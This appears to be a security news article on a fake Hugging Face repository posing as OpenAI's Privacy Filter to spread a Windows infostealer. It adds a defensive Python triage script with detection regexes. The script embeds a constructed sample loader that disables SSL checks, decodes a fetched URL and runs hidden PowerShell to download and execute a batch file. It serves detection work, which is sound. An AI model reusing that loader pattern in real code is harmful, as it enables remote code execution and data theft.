A counterfeit repository on Hugging Face imitated OpenAI’s Privacy Filter and reached the top of the platform’s trending list while distributing a Rust-based information stealer to Windows users. The project, named Open-OSS/privacy-filter, copied the official description of OpenAI’s Privacy Filter, misleading users into downloading it. Hugging Face has since removed the malicious repository.
Deceptive Repository Tactics
OpenAI introduced the Privacy Filter in April 2026 to identify and redact personal information in text, enhancing privacy and security features in applications. The fraudulent repository closely mimicked OpenAI’s legitimate offering, even copying the model card description. A report by HiddenLayer revealed that the repository’s loader.py file executed infostealer malware on Windows devices.
The malicious project instructed users to clone the repository and run a batch file (“start.bat”) on Windows or a Python script (“loader.py”) on other systems. The setup installed dependencies and launched the model, but also ran malicious code that disabled SSL certificate verification, decoded a URL retrieved from JSON Keeper, a public JSON-hosting service, and used it to execute commands via PowerShell. Because the URL lived outside the repository, attackers could change payloads without modifying the repository itself.
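As an added defensive example (not code from HiddenLayer’s report or from the repository), the script below triages a cloned model repository for loader files that combine the behaviours described above: SSL verification disabled, an encoded URL pulled from a public JSON host, and PowerShell spawned from Python or a batch file. The regexes, the jsonkeeper.com hostname and the sample loader are assumptions constructed from this description.

```python
import re
import sys
from pathlib import Path
from typing import Dict, List

# Behaviours the report attributes to the loader, expressed as regexes.
# Assumed triage indicators, not signatures taken from the real loader.py.
INDICATORS = {
    "ssl_verification_disabled": re.compile(
        r"_create_unverified_context|verify\s*=\s*False|CERT_NONE"),
    "decodes_embedded_url": re.compile(r"b64decode|bytes\.fromhex|codecs\.decode"),
    "fetches_public_json_host": re.compile(r"jsonkeeper\.com", re.IGNORECASE),
    "spawns_powershell": re.compile(
        r"powershell(\.exe)?\b.*?(-enc\w*|-nop|-w(indowstyle)?\s+hidden|iex|downloadstring)",
        re.IGNORECASE),
    "shell_from_python": re.compile(
        r"(subprocess\.(run|call|Popen)|os\.system)\(.*shell\s*=\s*True"),
}
SCANNED_SUFFIXES = {".py", ".bat", ".cmd", ".ps1"}
MIN_HITS_TO_FLAG = 2  # a lone verify=False is common in benign code


def scan_text(text: str) -> List[str]:
    """Return the names of indicators present in one file's contents."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def is_suspicious(hits: List[str]) -> bool:
    """Flag only when several loader behaviours co-occur in one file."""
    return len(set(hits)) >= MIN_HITS_TO_FLAG


def triage_repo(root: Path) -> Dict[str, List[str]]:
    """Map each flagged file (path relative to root) to its indicator hits."""
    flagged: Dict[str, List[str]] = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in SCANNED_SUFFIXES:
            hits = scan_text(p.read_text(errors="replace"))
            if is_suspicious(hits):
                flagged[str(p.relative_to(root))] = hits
    return flagged


# Constructed sample mirroring the described loader; not the actual code.
SAMPLE_LOADER = '''
import ssl, base64, json, subprocess, urllib.request
ssl._create_default_https_context = ssl._create_unverified_context
cfg = json.load(urllib.request.urlopen("https://jsonkeeper.com/b/PLACEHOLDER"))
url = base64.b64decode(cfg["u"]).decode()
subprocess.run(f'powershell -nop -w hidden -c "iwr {url} -OutFile s.bat; ./s.bat"', shell=True)
'''

if __name__ == "__main__":
    if len(sys.argv) > 1:  # usage: python triage.py /path/to/cloned/repo
        for f, h in triage_repo(Path(sys.argv[1])).items():
            print(f"SUSPICIOUS {f}: {', '.join(h)}")
    else:
        print("sample loader hits:", scan_text(SAMPLE_LOADER))
```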
Complex Malware Operations
Using PowerShell, the malware downloaded a secondary batch script from a remote server, “api[.]eth-fastscan[.]org”, which elevated privileges, excluded itself from antivirus scans, and created scheduled tasks to run additional scripts. While these tasks were temporary, they served as the launch point for the information stealer, which took screenshots, collected data from Discord and cryptocurrency wallets, and extracted browser information.
The malware also used detection-evasion techniques such as checking for debuggers and sandboxes and disabling Windows security features. The stolen data was transmitted in JSON format to “recargapopular[.]com”. Before being taken down, the repository had amassed about 244,000 downloads, a figure likely inflated artificially to deceive users.
Broader Cybersecurity Implications
Further investigation uncovered six additional repositories using a similar Python loader to distribute the malware. The domain “api[.]eth-fastscan[.]org” was found delivering a different Windows executable that connected to a command-and-control server used in prior malicious campaigns.
The attack highlights a new vector for deploying the ValleyRAT trojan, previously linked to phishing and SEO poisoning, and attributed to the Chinese group Silver Fox. HiddenLayer suggests these activities could be interconnected, pointing to a larger supply chain attack targeting open-source platforms.
This incident underscores the importance of vigilance in downloading software from trusted sources and the ongoing need for robust cybersecurity measures to protect against evolving threats.
